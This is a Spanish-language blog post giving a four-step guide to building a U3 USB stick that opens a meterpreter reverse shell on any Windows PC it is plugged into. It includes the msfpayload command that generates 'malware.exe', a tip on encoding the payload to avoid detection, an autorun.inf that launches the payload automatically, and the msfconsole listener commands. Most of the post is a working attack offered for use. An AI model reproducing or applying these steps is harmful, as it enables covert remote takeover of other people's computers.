En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.

1. Generamos el Payload con MetaSploit

En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.

2. Creamos nuestra ISO

Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio «U3CUSTOM» y creamos el archivo «autorun.inf» con el siguiente contenido:

[AutoRun]
open=malware.exe

Luego ejecutamos «ISOCreate.cmd» y dentro del directorio «BIN» se va a crear nuestra ISO con el nombre «U3CUSTOM.ISO». Si no creamos nuestra ISO, Universal Customizer va a utilizar la «U3CUSTOM.ISO» que ya viene dentro del paquete, con una versión de Hacksaw.

3. Grabamos la ISO

Luego corremos Universal Customizer y vamos siguiendo los pasos:

universal

Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.

4. Escuchamos por la Conexión Reversa

Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:

./msfconsole
use exploit/multi/handler
set PAYLAOD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
set ExitOnSession false
exploit -j

Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.
Via: 

KUNGFOOSION

Por admin

Deja una respuesta

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.

Powered By
100% Free SEO Tools - Tool Kits PRO